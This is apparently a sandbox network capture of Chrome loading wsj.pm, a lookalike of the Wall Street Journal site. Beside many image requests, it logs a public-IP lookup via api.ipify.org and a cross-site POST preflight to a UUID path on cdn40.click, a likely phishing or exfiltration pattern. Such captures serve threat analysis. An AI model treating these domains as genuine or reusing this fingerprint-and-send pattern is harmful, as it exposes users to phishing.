Timestamp                Bytes transferred  Direction  Data
2024-04-25 14:58:19 UTC  581                OUT        GET /img/wsj-social-share.png HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:19 UTC  251                IN         HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:19 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:18:50 GMT
                                                                                                                ETag: "8f91-6164904d8ba80"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 36753
                                                                                                                Connection: close
                                                                                                                Content-Type: image/png


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
19          192.168.2.17  49739        103.113.70.37   443               6544  C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp                Bytes transferred  Direction  Data
2024-04-25 14:58:19 UTC  575                OUT        GET /img/im-949345.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:19 UTC  252                IN         HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:19 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:15:57 GMT
                                                                                                                ETag: "9697-61648fa88f540"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 38551
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
20          192.168.2.17  49740        103.113.70.37   443               6544  C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp                Bytes transferred  Direction  Data
2024-04-25 14:58:19 UTC  574                OUT        GET /img/im-949675.png HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:20 UTC  250                IN         HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:16:09 GMT
                                                                                                                ETag: "21c5-61648fb401040"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 8645
                                                                                                                Connection: close
                                                                                                                Content-Type: image/png


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                21 | 192.168.2.17 | 49741 | 104.26.13.205 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:19 UTC | 349 | OUT | GET /?format=json HTTP/1.1
                                                                                                                Host: api.ipify.org
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC | 217 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                Vary: Origin
                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 879f30cbcd9eb0a5-ATL
                                                                                                                2024-04-25 14:58:20 UTC | 23 | IN | Data Raw: 7b 22 69 70 22 3a 22 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 22 7d
                                                                                                                Data Ascii: {"ip":"185.152.66.230"}


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                22 | 192.168.2.17 | 49742 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:20 UTC | 575 | OUT | GET /img/im-948848.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC | 251 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:16:24 GMT
                                                                                                                ETag: "2572-61648fc24f200"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 9586
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                23 | 192.168.2.17 | 49743 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:20 UTC | 598 | OUT | GET /img/CH-AA158_Bernst_NS_20100111195708.gif HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC | 250 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:16:37 GMT
                                                                                                                ETag: "1c6a-61648fceb4f40"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 7274
                                                                                                                Connection: close
                                                                                                                Content-Type: image/gif


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                24 | 192.168.2.17 | 49744 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:20 UTC | 568 | OUT | GET /img/AM.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC | 252 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:16:52 GMT
                                                                                                                ETag: "4b4e-61648fdd03100"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 19278
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                25 | 192.168.2.17 | 49745 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:20 UTC | 567 | OUT | GET /img/AM.png HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC | 251 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:17:03 GMT
                                                                                                                ETag: "c5a8-61648fe7809c0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 50600
                                                                                                                Connection: close
                                                                                                                Content-Type: image/png
                                                                                                                Data Ascii: U879A{\A@Pp!,!vh\,;#i b<1]cOAA4H^FY3*?vGSh"bpw;T}VF_il~7[C6~PwEFjZ/PtP!2Bh~g#8]jVzO.5ytm6Jw%Q
                                                                                                                2024-04-25 14:58:20 UTC2659INData Raw: 0a 3e 80 48 31 77 94 84 f2 89 c1 6c b0 7a 26 56 0d 7e 02 d6 00 c1 f2 e1 f9 1a e1 96 a3 62 21 09 48 67 a6 bd e9 60 9e 06 a2 23 af 28 8e a4 f7 bd c5 99 3c 35 4b 9e 97 d9 0a 77 4a e9 3a fa c7 12 53 06 f1 66 82 20 97 c8 0b d6 57 f7 c9 9a 7b 8e d6 7d 11 1e 16 5f f3 8c aa 34 aa 17 74 4f c4 41 0b 59 19 2f de 8b d2 14 e3 20 0f 24 9f 79 ea e2 43 fd ec 1a 0c 8c f9 90 07 ac b4 4a ac 95 e1 53 8c cc 10 e6 c5 36 9f 47 89 7d ce 77 41 e6 92 da fa 4b 01 cc bd be c4 92 7a 3e bf 43 2c 90 44 2b df 7f 76 40 75 fd 84 32 ca af 9e 0a 47 76 3a 2e cc 3d b0 b5 52 36 94 95 01 80 96 78 56 35 ae b1 96 bc f6 1a ec ab e5 5b 0f a1 70 4f 11 22 2c a3 bd 46 3c 34 b6 89 a7 c2 50 e5 21 34 50 c5 40 60 a5 52 bc 4e e2 3c 0b 88 09 a1 49 10 f7 9d 50 cc 04 b4 b0 f1 17 19 bc b3 ff 60 9c 98 32 4f c4
                                                                                                                Data Ascii: >H1wlz&V~b!Hg`#(<5KwJ:Sf W{}_4tOAY/ $yCJS6G}wAKz>C,D+v@u2Gv:.=R6xV5[pO",F<4P!4P@`RN<IP`2O


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.17 | 49747 | 23.133.88.190 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:58:20 UTC | 551 | OUT | OPTIONS /9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb95 HTTP/1.1
                                                                                                                Host: cdn40.click
                                                                                                                Connection: keep-alive
                                                                                                                Accept: */*
                                                                                                                Access-Control-Request-Method: POST
                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                Origin: https://wsj.pm
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:20 UTC | 421 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Content-Length: 0
                                                                                                                Connection: close
                                                                                                                X-Powered-By: Express
                                                                                                                allow: OPTIONS, POST
                                                                                                                access-control-allow-origin: https://wsj.pm
                                                                                                                access-control-allow-headers: content-type
                                                                                                                access-control-allow-methods: DELETE, GET, HEAD, OPTIONS, PATCH, POST, PUT
                                                                                                                vary: Origin
                                                                                                                ETag: W/"0-2jmj7l5rSw0yVb/vlWAYkK/YBwk"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.17 | 49746 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:58:20 UTC | 574 | OUT | GET /img/im-948629.png HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:20 UTC | 251 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:17:17 GMT
                                                                                                                ETag: "5584-61648ff4da940"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 21892
                                                                                                                Connection: close
                                                                                                                Content-Type: image/png


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.17 | 49748 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:58:20 UTC | 575 | OUT | GET /img/im-949113.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:20 UTC | 250 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:17:29 GMT
                                                                                                                ETag: "c91-616490004c440"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 3217
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.17 | 49752 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:58:20 UTC | 396 | OUT | GET /vir.wsj.net/fp/assets/webpack4/img/wsj-logo-big-black.165e51cc.svg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:20 UTC | 254 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Mon, 31 Aug 2020 06:54:20 GMT
                                                                                                                ETag: "1d3e-5ae26df2fdf00"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 7486
                                                                                                                Connection: close
                                                                                                                Content-Type: image/svg+xml
2024-04-25 14:58:20 UTC | 7486 | IN | Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="783" height="112.588"><path d="M21.652 61.544c0 3.023.878 3.607 2.829 4.097l3.023.683v1.365H7.412v-1.365l2.536-.584c1.951-.487 2.829-1.465 2.829-4.193V2.438h-2.146c-6.047 0-8.485 9.851-9.168 20.287H0V.488h34.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.17 | 49749 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:58:20 UTC | 354 | OUT | GET /img/wsj-social-share.png HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:20 UTC | 251 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:18:50 GMT
                                                                                                                ETag: "8f91-6164904d8ba80"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 36753
                                                                                                                Connection: close
                                                                                                                Content-Type: image/png


                                                                                                                Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                31          192.168.2.17  49750        103.113.70.37   443               6544  C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                                                2024-04-25 14:58:20 UTC  348                OUT        GET /img/im-949345.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC  252                IN         HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:15:57 GMT
                                                                                                                ETag: "9697-61648fa88f540"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 38551
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg


                                                                                                                Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                32          192.168.2.17  49751        103.113.70.37   443               6544  C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                                                2024-04-25 14:58:20 UTC  347                OUT        GET /img/im-949675.png HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC  250                IN         HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:16:09 GMT
                                                                                                                ETag: "21c5-61648fb401040"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 8645
                                                                                                                Connection: close
                                                                                                                Content-Type: image/png


                                                                                                                Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                33          192.168.2.17  49753        103.113.70.37   443               6544  C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                                                2024-04-25 14:58:20 UTC  575                OUT        GET /img/im-949723.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC  250                IN         HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:17:39 GMT
                                                                                                                ETag: "4da-61649009d5ac0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 1242
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg


                                                                                                                Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                34          192.168.2.17  49754        103.113.70.37   443               6544  C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                                                2024-04-25 14:58:20 UTC  348                OUT        GET /img/im-948848.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC  251                IN         HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:16:24 GMT
                                                                                                                ETag: "2572-61648fc24f200"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 9586
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg


                                                                                                                Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                35          192.168.2.17  49755        103.113.70.37   443               6544  C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                                                2024-04-25 14:58:20 UTC  577                OUT        GET /img/im-44291453.avif HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC  250                IN         HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:17:51 GMT
                                                                                                                ETag: "4ba-61649015475c0"
                                                                                                                Accept-Ranges: bytes
